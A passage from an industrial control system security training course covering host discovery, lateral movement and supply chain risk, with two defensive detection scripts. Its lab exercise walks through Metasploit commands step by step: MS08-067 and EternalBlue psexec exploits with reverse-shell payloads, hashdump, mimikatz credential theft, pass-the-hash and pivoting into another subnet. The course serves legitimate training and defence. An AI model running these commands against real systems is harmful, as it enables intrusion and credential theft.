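            counts[dst] += 1
            # Drop events older than the window; the current one keeps it non-empty.
            while ts - window[0][0] > window_s:
                _, old_dst = window.popleft()
                counts[old_dst] -= 1
                if counts[old_dst] == 0:
                    del counts[old_dst]
            peak = max(peak, len(counts))
        if peak >= threshold:
            alerts[key] = peak
    return alerts


# Assumed thresholds, not values from the course: tune them to the network.
ARP_WINDOW_S, ARP_THRESHOLD = 60, 20    # 20 distinct targets within a minute
TCP_WINDOW_S, TCP_THRESHOLD = 600, 5    # 5 distinct hosts on one port in 10 min


def run_detections(events):
    arp = fan_out_alerts([e for e in events if e[2] == "arp"], ARP_WINDOW_S, ARP_THRESHOLD)
    tcp = fan_out_alerts([e for e in events if e[2] == "tcp"], TCP_WINDOW_S, TCP_THRESHOLD)
    return {**arp, **tcp}


def constructed_events():
    """Constructed traffic, not a capture: one host sweeps 40 addresses with
    ARP in eight seconds and later probes port 445 on eight hosts a minute
    apart; a gateway resolves two addresses and an HMI polls one PLC on 502."""
    ev = []
    for i in range(1, 41):
        ev.append((100.0 + 0.2 * i, "10.10.10.52", "arp", 0, f"10.10.10.{i}"))
    ev.append((100.0, "10.10.10.1", "arp", 0, "10.10.10.21"))
    ev.append((130.0, "10.10.10.1", "arp", 0, "10.10.10.45"))
    for i, last in enumerate((10, 20, 21, 22, 23, 35, 45, 254)):
        ev.append((500.0 + 60.0 * i, "10.10.10.52", "tcp", 445, f"10.10.10.{last}"))
    for i in range(20):
        ev.append((500.0 + 5.0 * i, "10.10.10.35", "tcp", 502, "10.10.10.10"))
    return ev


if __name__ == "__main__":
    for (src, proto, dport), peak in sorted(run_detections(constructed_events()).items()):
        print(f"{src} {proto}/{dport}: {peak} distinct targets in one window")
```

The HMI polling a single PLC every five seconds generates far more packets than the scan but never
raises the distinct-destination count, which is why fan-out rather than packet volume is the
quantity to watch; the TCP window has to be long because the point of a slow scan is to stay under
short-window counters.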
Hostname enumeration is often overlooked by network defenders; however, hostnames can give
attackers targets without ever needing to do port scanning. Many companies name their Windows
domain controllers with the letters AD (for Active Directory) somewhere in the name. In control
systems it is not uncommon to name a PLC with "plc" in the name, or "HMI", or other names that can
help attackers zero in on specific targets. Hostnames can be queried from Windows operating systems
using the DOS net view command, or there are ways to query a domain controller to give out the
names of hosts that are associated with the domain. If enabled, an attacker can do a DNS zone
transfer, which will retrieve the entire DNS table. If that does not work, then the attacker can do
DNS lookups using IP addresses found in an ARP scan. Once an attacker knows the IPs, manufacturers
and hostnames, targeting other systems becomes much easier.
Pivot points are the points in a subnet that allow network traffic to reach other subnets.
Sometimes these points are referred to as network bridges. These bridges can simply be a host with
multiple network interface cards, or routers or firewalls. For attackers to pivot into other
subnets, they need to find these bridges and circumvent any security preventions.
Let's look at host discovery more closely using the Linux arp-scan program. ARP scanning can only
discover hosts that are within the same subnet, which means arp-scan must be executed from a host
on the same subnet as the hosts being queried.

Host discovery tools
Here are various ways to collect hostname information. Some services such as DNS can be restricted
to not allow zone transfers, so they may or may not give any useful information.
• Windows/DOS Commands
o net view – Lists Windows host names within the same domain
o nslookup <IP address> – lists the hostname associated with the IP address
o systeminfo – lists system information (Windows XP and newer)
o sc – Service Control – Create, Start, Stop, Query or Delete any Windows service
• Linux Commands
o dig axfr <domain.name> @<dns_server> – DNS zone transfer that dumps the entire DNS zone
  (try classroom.edu and 1.2.3.5)
o nslookup <IP address> – lists the hostname associated with the IP address
o arp-scan <IP addresses>
• Metasploit modules – Use the info command with these modules for more information
o auxiliary/scanner/smb/smb_version
o auxiliary/gather/enum_dns
o post/windows/gather/enum_computers
o post/windows/recon/computer_browser_discovery

Host discovery exercise


This exercise will cover how to use different host discovery techniques to map the target
network.
NOTE: This exercise is done virtually using Netlab. Before completing this exercise, view the
Netlab "How to" video located in this course.
1. Open https://ics-labs.inl.gov in a new window/tab to avoid closing your VLP session.
2. Login and schedule a reservation for the LO8 exercise.
3. Enter your reservation.
4. Follow the instructions listed below.

Lab Settings
The information in the table below lists the basics of the environment.

  Virtual Machine   IP Address   Account (if needed)     Password (if needed)
  Kali                           Auto Logged in - root   Auto Logged in - toor

To begin the exercise, click the Kali Linux Host in the diagram or on the tab listed at the top.
Then, enter the password from the above table if required.

NOTE: Please write down what you find during this hands-on exercise. You will be asked a few
questions after you complete this exercise that you will need to answer correctly, using the
information you collect, in order to continue your training.
You have been given SSH access, by a hacker colleague, to an Acme Shipping Linux host that is
accessible from the Internet. To maintain some persistence your colleague created an SSH certificate
and installed it on the host. The host IP address is 10.20.3.52. The IP address of the Kali Linux
host you are using is 10.2.3.101.
1. Open a terminal window and run the following command:
ssh 10.20.3.52
Notice that with the SSH certificate you do not need to supply a password.
What is your username access? ________________________________
What is the name of the host? _________________________________
Based on the hostname, what is it used for? ______________________
2. Look around and see what you can find. Commands to try:
List files: ls
Current directory: pwd
List network adaptors: ifconfig
List network connections: netstat -pantu
What is this host’s real IP address? _____________________________
What other username has logged into this host in the past? (hint: try looking in the /home
directory) _________________________________________________
What other interesting data can be found on this host? ________________________________
__________________________________________________________
3. Time to do reconnaissance. DO NOT use Nmap. If you don't know what you are doing, Nmap is
very noisy and you will get caught. Let's start by using arp-scan; type:
arp-scan 10.10.10.0/24
How many IP’s responded? ____________________________________
What IP’s were discovered? ____________________________________
4. Let's find out which of these are Windows hosts. We could use Nmap, but that can be noisy, so
we will use a Metasploit module.
5. Exit the SSH connection to this host by typing exit and then pressing enter.
6. In the Kali terminal window run the following python script file
NOTE: this is a custom script not a standard Kali nor bash command:
./tunnelacme.py

This script does all the work to create an SSH tunnel between your Kali host and the Acme
Shipping Linux server that gives you access directly into Acme Shipping’s network. You should
see a line that says: **** Setting up SSH Tunnel(s) ****
Below this are lines indicating what happened.
First, a virtual network interface on the remote host was created named tun4 and assigned an
IP address of 10.1.2.1. It then created a virtual network interface on the Kali host named tun3
and assigned it the IP address 10.1.2.2. Next a route was added on the Kali host to the internal
Acme Shipping network address range of 10.10.10.0/24 to route through IP address 10.1.2.2.
Finally, two entries were made into iptables on the Acme Shipping host to do IP forwarding into
the Acme Shipping network.
7. Let’s verify all this. Type the following command:
ifconfig
You should see the tun3 entry with the IP address 10.1.2.2.
8. Now the route command.
route -n
At the bottom of the list you should see the Destination address range 10.10.10.0 should be
forwarded through the tun3 interface.
9. Check to make sure the tunnel is up by trying to ping the Linux host:
ping -c 3 10.10.10.52
You should get three successful ping lines.
10. Now bring up msfconsole by clicking the msfconsole button on the tool bar:

11. There are lots of Windows exploits so let’s find which of the harvested IP’s are Windows hosts
by using a module named smb_version. Type the following two in msfconsole:
use auxiliary/scanner/smb/smb_version
options
You can see various options, but the only one we need is to set RHOSTS to our identified IP
addresses. We already know that 10.10.10.52 is a Linux host so type:
set RHOSTS 10.10.10.1,10,20,21,22,23,35,45,254
We will leave the rest of the options as they are. Now type:
run
12. What is nice about this module is that it also tells us what version of Windows is running along
with the hostname!
13. List the host names, IP’s, and Windows versions:


14. Fortunately, there are some Windows XP hosts listed and there are a bunch of XP exploits.
Let’s pick one and try an SMB exploit on it. This is probably not the first one in your target list,
however it would be nice to get some credentials from possibly a less secure host first. Type the
following commands:
use exploit/windows/smb/ms08_067_netapi
set RHOSTS 10.10.10.21
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.2.3.101
set LPORT 443
Why did we pick LPORT to be 443? Because the default LPORT of 4444 is a well-known
Metasploit port and there might be firewall rules that only let common Internet ports out.
15. Now type:
run
If everything went well, you should see something similar to the following on your screen:
[*] Started reverse TCP handler on 10.2.3.101:443
[*] 10.10.10.21:445 - Automatically detecting the target...
[*] 10.10.10.21:445 - Fingerprint: Windows XP - Service Pack 2 - lang:English
[*] 10.10.10.21:445 - Selected Target: Windows XP SP2 English (AlwaysOn NX)
[*] 10.10.10.21:445 - Attempting to trigger the vulnerability...
[*] Sending stage (180291 bytes) to 10.20.3.1
[*] Meterpreter Session 1 opened (10.2.3.101:443 -> 10.20.3.1:1198)
meterpreter >
16. Run some commands:
getuid
What user context are you connected to? ________________________________
netstat
What IP is this host connected to on which ports? __________________________
ifconfig
How many network interfaces are there? _________________________________

17. Can you harvest credentials? Try this following command:
hashdump
What happened and what did you get? ___________________________________
18. Can you get cleartext passwords? Try:
load mimikatz
wdigest
What happened and what did you get? ___________________________________
19. Let’s try and query the domain controller for more usernames by typing (you may get some
funny characters on the screen; this is because you are connected as system instead of a user):
background
use post/windows/gather/enum_domain_group_users
set GROUP Domain Users
set SESSION 1
run
What happened and what did you get? ___________________________________
___________________________________________________________________
___________________________________________________________________
___________________________________________________________________
___________________________________________________________________
20. Let’s look at the Domain Admins group by typing:
set GROUP Domain Admins
run
What happened and what did you get? ___________________________________
___________________________________________________________________
Is there anything that you can use? ______________________________________
21. Time to pick a new target. There are two targets that are worth investigating more, AD and
FILE-SERVER. You already have a user with Domain Admin credentials, so let’s pick FILE-
SERVER, which is a Windows 2016 Server host. A good exploit to try is another SMB exploit
commonly known as Eternal Blue, and you don’t need the administrator password, all you need
is the password hash that you harvested above, so scroll back up and find the password hash
and copy it and then you can simply paste it instead of trying to type all those characters.
Type the following:
use exploit/windows/smb/ms17_010_psexec
set RHOST 10.10.10.45
set SMBDomain acmeshipping.com

set SMBUser administrator
set SMBPass ecd5cf4324c2be3caad3b435b51404ee:b2114ab23e8dcff09c151d08026a219b
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 10.2.3.101
set LPORT 443
run
NOTE: If no session was created, type run again.
22. Now it is time to try grabbing more passwords! Even though you have the Administrator
password hash, a quick way to see if you have the proper permissions is to run the Meterpreter
built in hashdump command:
hashdump
23. On newer versions of Windows, you may get an error even though you have SYSTEM level
privileges. The way to get around this is to migrate the Meterpreter session to a different
process with the migrate command. First, you need to see what processes are running by
typing:
ps
24. Next pick a process such as winlogon.exe or services.exe. The process ID or PID is the far left
column of numbers and then type:
migrate <pid>
25. After the migration is successful you can load mimikatz, but because this is a newer version of
Windows, you will need to use a newer version of mimikatz named kiwi, so type:
load kiwi
And then:
creds_wdigest
26. Success! What is the Administrator password you got without decrypting the password hash?
_____________________________________________________________________
27. Now for more reconnaissance. Try using the following commands:
sysinfo
ipconfig
netstat
What did you find that can be leveraged as additional targets?
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________

_____________________________________________________________________
_____________________________________________________________________
28. Background the Meterpreter shell by typing background.

29. With a direct connection into Acme Shipping's network and with user credentials it is possible
to use remote desktop to remotely log in to hosts within the corporate network. As a reference:
Windows Server installations allow for two concurrent login sessions. Open a new terminal
window by clicking the Terminal menu option at the top of the screen and then selecting "New
Window", and then within the new bash window type (the -g 80% tells rdesktop to use 80% of the
screen to display the remote desktop):
rdesktop -g 80% 10.10.10.45
NOTE: Type "yes" for the "Do you trust this certificate" prompt.
You can try any of the usernames and passwords you have collected to log in.
Another reference: You can use remote desktop within a remote desktop to log in to other hosts.
To close rdesktop, simply close the window.
30. If you did your homework properly you noticed there is an open connection from 10.10.10.45 to
host 192.168.0.7 on Port 445, and Port 445 is, of course, SMB. Do you know the name of the
192.168.0.7 share? If you do not, how would you find it? (hint: try using the net use command
within a DOS command shell or use file explorer within remote desktop).
31. It looks as if you may have found a pivot point into another network. We can use some of the
Metasploit modules you've already used to investigate this new target; however, you will need to
tell msfconsole the route to this new subnet by using the route add command:
route add 192.168.0.0/24 <session id>
NOTE: you will need the session number for the Meterpreter session open to
10.10.10.45. You can get it through the msfconsole sessions command.
use auxiliary/scanner/smb/smb_version
set RHOSTS 192.168.0.7
run
What did you find?
_____________________________________________________________________
32. This looks like an interesting target. To attack the host, type the following:
use exploit/windows/smb/ms17_010_psexec
set RHOSTS 192.168.0.7
NOTE: msfconsole remembers what options you set previously:
options
33. After verifying the options, type:

run
34. To get back into msfconsole type background.
35. Now that you have a session open to 192.168.0.7 you need to change the msfconsole routing,
so the packets go directly into this subnet using this new session.
NOTE: you can just use the up arrow to find the previous route command and
modify it.
route del 192.168.0.0/24 <session id to 10.10.10.45>
route add 192.168.0.0/24 <session id to 192.168.0.7>
36. Reconnaissance time again. Type the following:
use post/windows/gather/arp_scanner
set RHOSTS 192.168.0.0/24
set SESSION <session id to 192.168.0.7>
run
What IP’s did you find that can be leveraged as additional targets?
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
_____________________________________________________________________
If no hosts are displayed after a minute, there may be a problem with your Meterpreter shell.
The easiest way to check is to type ctrl/c to stop the arp_scanner module and then check the
Meterpreter session as follows replacing <session #> with the appropriate session number:
sessions -i <session #>
getpid
If the command errors out type exit and go back to Step 32 above and continue forward.
That completes this exercise, but you can look around using some of the other tools discussed
in the lecture and see what else you can find.

End your reservation and return to the learning portal to continue with the next video.

Adversarial tactics and techniques (continued)
• Stolen or fabricated credentials
• ___________________________________
• ___________________________________
• ___________________________________
• System tools
• ___________________________________
• ___________________________________
• ___________________________________
• ___________________________________
• ___________________________________
• ___________________________________
• ___________________________________
• Exploitation
• ___________________________________
• ___________________________________
• ___________________________________

Some of these examples we have already discussed, but they continue to be relevant when acquiring
additional systems.
With valid credentials, especially administrator or root credentials, the attacker can access other
resources. In some cases, password reuse can come into play. For example, a user may have access
to Windows and Linux hosts and use the same password for both operating systems. In some
environments all hosts authenticate to a central authentication system. For example, in a mixed
Windows and Linux environment it is possible to force all authentication to be handled by the
Windows domain controller. Most users hate having to authenticate every time they need to access a
network resource. In ICS environments it may not be feasible to force users to individually log into
systems, and a shared login and password is implemented. In a Windows environment, when accessing
SMB services, it is possible to authenticate using only the password hash.
With single sign-on, any resource the account has access to, the attacker has access to also. It is
quite simple to access network file shares using the DOS net use command, and then whatever is
available on the network share the attacker has access to. With administrator credentials the hidden
network C$ and ADMIN$ shares can be mounted, accessed, and manipulated. The attacker can
download sensitive files or upload malicious files that other users can access.
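The hash-only SMB authentication and the hidden C$ and ADMIN$ shares described above both leave
records in the Windows Security log, which is where a defender can catch them. The script below is
an added example, not course material. It correlates network logons (event 4624 with LogonType 3)
with share-access events (5140) naming ADMIN$ or C$ and raises an alert when the source host is not
on an approved administration list; the event IDs, field names and share-name format are the
standard ones, while the event list, the approved-source set and the correlation window are
constructed assumptions.

```python
"""Correlate constructed Windows Security events to spot administrative
share access from hosts that should not be doing it. Event IDs and field
names are the standard ones; the events and allow-list are constructed."""

ADMIN_SHARES = {"\\\\*\\ADMIN$", "\\\\*\\C$"}
# Constructed assumption: administrators reach admin shares only from here.
APPROVED_ADMIN_SOURCES = {"10.10.10.20"}

EVENTS = [  # constructed, Time is seconds for readability
    {"EventID": 4624, "Time": 1000, "LogonType": 3, "AuthenticationPackageName": "Kerberos",
     "TargetUserName": "j.smith", "IpAddress": "10.10.10.21"},
    {"EventID": 5140, "Time": 1001, "ShareName": "\\\\*\\shared",
     "SubjectUserName": "j.smith", "IpAddress": "10.10.10.21"},
    {"EventID": 4624, "Time": 2000, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "administrator", "IpAddress": "10.10.10.20"},
    {"EventID": 5140, "Time": 2002, "ShareName": "\\\\*\\ADMIN$",
     "SubjectUserName": "administrator", "IpAddress": "10.10.10.20"},
    {"EventID": 4624, "Time": 3000, "LogonType": 3, "AuthenticationPackageName": "NTLM",
     "TargetUserName": "Administrator", "IpAddress": "10.10.10.21"},
    {"EventID": 5140, "Time": 3003, "ShareName": "\\\\*\\ADMIN$",
     "SubjectUserName": "administrator", "IpAddress": "10.10.10.21"},
    {"EventID": 5140, "Time": 3004, "ShareName": "\\\\*\\C$",
     "SubjectUserName": "administrator", "IpAddress": "10.10.10.21"},
]


def admin_share_alerts(events, approved_sources, window_s=60):
    """Return one alert dict per admin-share access from an unapproved source.
    Each alert carries the authentication package of the matching network
    logon (same source, same user, within window_s before the access) so
    an analyst can see whether NTLM rather than Kerberos was used."""
    events = sorted(events, key=lambda e: e["Time"])
    logons = [e for e in events if e["EventID"] == 4624 and e.get("LogonType") == 3]
    alerts = []
    for event in events:
        if event["EventID"] != 5140 or event["ShareName"] not in ADMIN_SHARES:
            continue
        if event["IpAddress"] in approved_sources:
            continue
        auth = None
        for logon in logons:
            same_user = logon["TargetUserName"].lower() == event["SubjectUserName"].lower()
            if (logon["IpAddress"] == event["IpAddress"] and same_user
                    and 0 <= event["Time"] - logon["Time"] <= window_s):
                auth = logon["AuthenticationPackageName"]
        alerts.append({
            "time": event["Time"],
            "user": event["SubjectUserName"],
            "source": event["IpAddress"],
            "share": event["ShareName"],
            "auth": auth,
        })
    return alerts


if __name__ == "__main__":
    for alert in admin_share_alerts(EVENTS, APPROVED_ADMIN_SOURCES):
        print(f"{alert['time']}: {alert['user']} from {alert['source']} "
              f"opened {alert['share']} (auth: {alert['auth']})")
```

Event 5140 is only written when object access auditing for file shares is enabled, so the first
check on a real domain is whether the events exist at all; the "auth" field is there because an NTLM
network logon by a privileged account from a workstation is exactly what hash-only authentication
produces, whereas the approved jump host in the constructed data is silently accepted even when it
uses NTLM.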
With VPN credentials the attacker comes in through the front door like any user and has immediate
access to network resources.
Remote Desktop refers to a type of software that allows access to a remote system. In Windows, the
remote desktop application is mstsc.exe. The attacker can possibly use Remote Desktop connections
on a victim host to access other hosts, hiding their access in the "normal" network traffic.
Virtual Network Computing (VNC) is a remote desktop application that is used to remotely control
another host. VNC is platform-independent; there are clients and servers for many GUI-based
operating systems. VNC is inherently insecure, and data that is being sent across the network can
be sniffed and pieced together by anyone with the correct tools and knowledge. Many component HMIs
have VNC servers built in that can be accessed from anywhere on the network.
An attacker can create malware-tainted documents and programs that could be placed on shared
drives that other users would consider safe to open and use.
It is also possible that trusted removable media could be utilized by an attacker to exploit other
systems.

• Local host data
• ___________________________________
• ___________________________________
• ___________________________________
• ___________________________________
• ___________________________________
• Shared network resources
• Removable media
• Email
• ___________________________________
• ___________________________________

Attackers will scour each compromised host for any and all documents and files that may help them
meet their goals. These can include:
Documents and other files
Screenshots
Audio / webcam captures
Keyboard keylogging
Application history information (web browser, chat, histories, etc.)
Email message contents

Contact data
Shared document repositories (e.g., shared drives and cloud services such as OneDrive,
SharePoint, and Google Drive)
Listed below are some commands you can try:
• netstat – Network connections
• ipconfig
• route
• dir – Directory listings
• systeminfo – System information
• net – Network information
o net view
o net use
o net user
o Other net options
• sc – Service control manager
• Other Windows / DOS commands

• Some methods and techniques
• Use of common ports:
• ___________________________________
• ___________________________________
• ___________________________________
• ___________________________________
• ___________________________________
• DNS over HTTPS
• Removable media
• VPN
• Legitimate web servers

• Some methods and techniques
• ___________________________________
• ___________________________________
• ___________________________________
• ___________________________________
• ___________________________________

• Bad public relations and loss of credibility
• Data destruction
• Denial of service
• Loss of proprietary information
• Loss of revenue
• Physical equipment destruction
• Loss of life

Additional Resources
MITRE ATT&CK® Knowledge Base
• PRE-ATT&CK Matrix (retired in 2020; its content now lives in the Enterprise matrix's Reconnaissance and Resource Development tactics)
  o https://attack.mitre.org/matrices/prep
• Enterprise Matrix
  o https://attack.mitre.org
• Industrial Control System Matrix
  o https://collaborate.mitre.org/attackics/index.php/Main_Page

Adversarial risk recap
Evaluation questions
When conducting an evaluation, the following questions can be asked:
• Have employees been trained to identify phishing emails?
• What host information can an aggressor find that helps identify potential high-value targets?
• What documentation available on the network contains 'sensitive' ICS network and/or ICS device information?

Cybersecurity plan mapping

Common issues/findings
• No general cybersecurity awareness training – staff are not receiving cybersecurity awareness training
• Multi-use systems – a single host is used to perform multiple tasks, which increases risk because of the multiple resources it has to access
• System diagrams and documentation are missing or incomplete

Learning Objective 9
Assess supply chain risk
Continuing with assessing risk to the business, we will now assess risk in the supply chain.
Why attack the supply chain?
Why pay attention to supply chain risks? An attack on the supply chain can compromise an organization's operations without being noticed. Supply chain attacks can be carried out without a vendor's knowledge, especially in today's environment, because vendors typically no longer make the physical equipment themselves – manufacturing is outsourced.
Types of attacks:
• Shipment intercept
• Hardware or software manipulation
• Manufacturing
• Misconfiguration (intentional / unintentional)
Vulnerabilities
There are multiple risks in supply chains. Listed here are the phases of the supply chain and the vulnerabilities typical of each.
• Design – Vulnerabilities introduced during design are often unintentional and can affect all users of the component. Malicious actors could also build vulnerabilities into components, which could then be installed in millions of pieces of equipment.
• Development and Production – Vulnerabilities introduced during this phase are often inadvertent and can be costly to fix if not identified during prototype testing. Well-designed products may still have malicious components introduced during manufacturing and assembly in a way that is difficult to identify.
• Distribution – Components transported between production facilities and customers often do not fall under the purview of the personnel responsible for design or production. Vulnerabilities introduced during distribution are more likely to be malicious but affect a limited number of components and customers compared to the earlier phases.
• Acquisition and Deployment – Malicious insiders may insert vulnerabilities or replace equipment with vulnerable components during acquisition or installation. Vulnerabilities introduced during this phase likely affect a limited number of customers.
• Maintenance – ICT components receiving maintenance are susceptible to vulnerabilities introduced through physical or network access, and to exploitation of previously unknown or unpatched vulnerabilities. Vulnerabilities introduced during maintenance might be targeted at specific entities but can affect many customers in the case of software updates.
• Disposal – ICT components that are improperly disposed of can contain sensitive company or customer data. Malicious actors can also refurbish components and resell them as new. Used parts may be less reliable and prone to failure, or have malware installed.
Supply chain: NIST draft NISTIR 8276
The National Institute of Standards and Technology (NIST) cyber supply chain risk management (C-SCRM) program was initiated in 2008 to begin the development of C-SCRM practices for non-national security systems in response to Comprehensive National Cybersecurity Initiative (CNCI) #11: Develop a multi-pronged approach for global supply chain risk management. Over the past decade, NIST has continued to develop publications and conduct further research on industry best practices for C-SCRM. NISTIR 8276 (Key Practices in Cyber Supply Chain Risk Management: Observations from Industry) presents key practices and recommendations that were developed as a result of research conducted in 2015 and 2019, including expert interviews, development of case studies, and analysis of existing government and industry resources.
Key practices per the NISTIR 8276 draft
• Integrate C-SCRM across the organization
• Establish a formal C-SCRM program
• Know and manage your critical suppliers
• Understand your supply chain
• Closely collaborate with your key suppliers
• Include key suppliers in your resilience and improvement activities
• Assess and monitor throughout the supplier relationship
• Plan for the full life cycle
Sample recommendations from NISTIR 8276
• Establish a supply chain risk council
• Create explicit collaborative roles
• Integrate cybersecurity considerations into the system and product life cycle
• Clearly define roles for the security aspects of supplier relationships
• Use requirement lists and SLAs to set requirements with suppliers
• Propagate security requirements to suppliers' sub-suppliers
• Know whether your data and infrastructure are accessible to suppliers' sub-suppliers
• Include key suppliers in incident response and business continuity planning
• Collaborate on lessons learned
• Have plans in place for the obsolescence of supplied products

Each key practice includes several recommendations, which synthesize how these practices can be implemented from a people, process, and technology perspective.
NOTE: See the NIST document for the complete list.
Considerations

Use cases
A Chinese manufacturer that sells popular devices for scanning items shipped or transported apparently has been implanting malware in its products, as well as via the Windows XP Embedded version of the software on the scanner maker's support website. Researchers from TrapX Security, which today provided details of the attacks, say scanners with another variant of the same malware were also sold to a large robotics firm and seven other companies, which they did not name.
https://www.darkreading.com/attacks-breaches/chinese-hackers-target-logistics-and-shipping-firms-with-poisoned-inventory-scanners/d/d-id/1297182
In 2011, the Senate Armed Services Committee (SASC) investigated the problem of counterfeits in the DOD supply chain. One of the examples cited in the SASC's report was counterfeit integrated circuits (ICs) in an ice detection module found on the Navy's P-8A Poseidon airplane. The P-8A is a modified Boeing 737 that incorporates anti-submarine and anti-surface warfare capabilities. After the Navy purchased the aircraft from Boeing, the manufacturer of the ice detection system, BAE Systems, discovered the ICs were counterfeit. Upon further examination it was concluded the ICs had been sanded down, resurfaced, and remarked to appear new. When traced back through the supply chain, it was found that BAE had purchased the components from a U.S. supplier. However, the U.S. supplier originally purchased the ICs from a company in Shenzhen, China.
https://medium.com/homeland-security/americas-military-breached-by-counterfeit-electronics-12dc207f257c

Supply chain exercise
Goal: Identify supply chain threats from the articles below, then brainstorm other threats that could be possible.

Article 1 – Chinese Hackers Target Logistics & Shipping Firms with Poisoned Inventory
Scanners
By Kelly Jackson Higgins
https://www.darkreading.com/attacks-breaches/chinese-hackers-target-logistics-and-shipping-firms-with-poisoned-inventory-scanners/d/d-id/1297182
'ZombieZero' still actively pushing rigged handheld scanning devices, reviving concerns of doing
business with Chinese tech companies.
Malware-poisoned handheld inventory scanners from China are stealing information from logistics and
shipping firms as well as manufacturing companies around the globe in an attack campaign dubbed
"ZombieZero" by the researchers who discovered it.
A Chinese manufacturer that sells the popular devices for scanning items shipped or transported
apparently has been implanting the malware in its products, as well as via the Windows XP embedded
version of the software on the scanner maker's support website. Researchers from TrapX Security,
which today provided details of the attacks, say scanners with another variant of the same malware
were also sold to a large robotics firm and seven other companies, which they did not name.
Logistics firms use the scanners to track shipments as they are loaded and unloaded from ships,
trucks, and airplanes.
"The attackers were exfiltrating all [stolen information] to a database," says Carl Wright, general
manager of TrapX. "They are very focused on manifests -- what's in it, what's the value of it."

Once the scanner is connected to the victim's wireless network, it attacks the corporate network via the
server message block (SMB) protocol, and the scanned information, including origin, destination,
contents, value, and shipper and recipient information, is sent to a botnet that terminates at the
Lanxiang Vocational School purportedly located in the Shandong province in China. The school has
been linked to the infamous Operation Aurora cyber espionage campaign that hit Google, Adobe, Intel,
and many other major U.S. firms more than four years ago and is located one block from the inventory
scanner manufacturer in question, according to TrapX.
The botnet then sends the scanner a second piece of malware that targets the victim's corporate
financial, customer, shipping, and manifest information. "That was able to take control of the ERP
[enterprise resource planning] system," Wright says. This would, among other things, allow the attacker
to make a package "disappear" or "reappear," he said. The attack targets a specific, major ERP
system, says Wright, who declined to reveal the name of the product due to an investigation into the
attacks.
Wright says it is difficult to discern if the attackers are after the logistics firms themselves or their
customers.
"The exfiltration of all financial data as well as CRM data was achieved providing the attacker complete
situational awareness and visibility into the shipping and logistics targets worldwide operations," TrapX
said in a report it published today on the attacks.
Some supply chain threats from this article include:
• Buying devices with malware already installed
• The access the scanners have across the network once they are connected
• Downloading the Windows XP Embedded image from the manufacturer's support website
• The view the attacker gains into shipping and logistics operations
Article 2 – America’s Military Breached by Counterfeit Electronics
https://medium.com/homeland-security/americas-military-breached-by-counterfeit-electronics-12dc207f257c
In 2016, the U.S. allocated $598 billion to defense spending. A substantial portion of the funding went
towards defense systems and equipment that contain electronic components critical to the success of
our warfighter’s mission. Due to the defense systems dependence on these electronic parts and the
ever-shortening life cycles of electronic components, the DOD supply chain is highly susceptible to the
introduction of counterfeits. The presence of counterfeit electronic components can be seen through
several different sources.
Background
In 2011, the Senate Armed Services Committee (SASC) investigated the problem of counterfeits in the
DOD supply chain. In so doing it identified vulnerabilities throughout the supply chain that allowed
counterfeit parts to infiltrate crucial defense systems, thereby risking national security and the lives of
those who protect it. The investigation further identified that 70% of all counterfeits come from China,
and a majority of the remaining counterfeits could be traced back through the supply chain to China.
One of the examples cited in the SASC's report was counterfeit integrated circuits (ICs) in an ice detection module found on the Navy's P-8A Poseidon airplane. The P-8A is a modified Boeing 737 that incorporates anti-submarine and anti-surface warfare capabilities. After the Navy purchased the aircraft from Boeing, the manufacturer of the ice detection system, BAE Systems, discovered the ICs were counterfeit. Upon further examination it was concluded the ICs had been sanded down, resurfaced,
and remarked to appear new. When traced back through the supply chain, it was found that BAE purchased the components from a U.S. supplier. However, the U.S. supplier originally purchased the ICs from a company in Shenzhen, China.
The technique of resurfacing electronic components was highlighted by the Institute of Electrical and
Electronics Engineers (IEEE) in an article titled Response to Counterfeit IC’s in the Supply Chain, in its
2008 Annual Technology Report. The report found that historically counterfeits were “clones” or copies
of high value components; however, with the maturing of the electrical industry coupled with the
increasing number of obsolete units, opportunities for counterfeiters have expanded. This has allowed
for the use of traditional counterfeiting methods which include remarking the product type or speed of
high-end components.
Another indicator of the prevalence of counterfeit components is the scope of enforcement efforts that have been initiated to identify and interdict these bogus parts. Two of the initial efforts included operations "Cisco Raider" and "Network Raider" as identified by the Federal Bureau of Investigation (FBI). These actions specifically targeted counterfeit network hardware, to include network routers, switches, network cards and modules manufactured by Cisco and other well-known companies. Both efforts were international multiagency efforts that included the FBI, Homeland Security Investigations (HSI), Customs and Border Protection (CBP), Royal Canadian Mounted Police (RCMP), Canadian Border Services Agency (CBSA), Defense Criminal Investigative Service (DCIS) and the Internal Revenue Service (IRS). These two efforts alone resulted in the issuance of more than 35 search warrants, 40 convictions and the seizure of $220 million in counterfeit network hardware.
Response
Due to the breadth of the infiltration and potentially devastating consequences, Congress, law enforcement and industry partners have undertaken multiple efforts to combat this problem.
In 2012, Congress introduced a bipartisan amendment to the National Defense Authorization Act (NDAA). The intent of the amendment was to stop the importation of counterfeit electronic parts into the U.S. through the following measures: addressing weaknesses in the defense supply chain, implementing aggressive counterfeit avoidance practices across the entire defense industry, and actually defining what constituted a counterfeit or suspected counterfeit part.
While the amendment was passed in 2011, it wasn’t until the final rule was issued in 2014, that the
Defense Federal Acquisition Regulation Supplements (DFARS) were changed to include the following;
the definitions for counterfeit electronic part, suspect counterfeit part, electronic part and obsolete
electronic part; the required reporting of counterfeit or suspect parts would be done through the
Government-Industry Data Exchange Program (GIDEP); mandated that contractors and subcontractors
have a review/detection process in place to identify counterfeit/suspect parts; and that contractors and
subcontractors would not be held civilly liable for the reporting of counterfeit parts.
In 2011, the National Intellectual Property Rights Coordination Center (NIPRCC) initiated Operation
Chain Reaction (OCR), a joint taskforce initiative comprised of sixteen law enforcement agencies.
While there were efforts by individual agencies to identify and interdict counterfeit items entering the
federal supply chain, OCR was the first time that IPR Center members had collectively addressed the
issue. Since its inception OCR has resulted in numerous arrests, convictions, and the forfeiture of
millions of dollars. As a result, OCR was cited in the Joint Strategic Plan on Intellectual Property
Enforcement.
In 2015, the Counterfeit Avoidance Accreditation Program (CAAP) was developed through industry
efforts to mitigate the risk of introducing counterfeit parts into the supply chain for the aviation, space,
and defense industries. The program uses a managed approach that brings together technical experts
from both industry and government, to ensure compliance with the standards associated with the
prevention and detection of counterfeit parts. Industry partners work together to define operational
program requirements, establish requirements for accreditation and grant accreditation. On March 2, 2017 Rockwell Collins became the first company in the world to achieve CAAP accreditation for its supply chain management procedures.
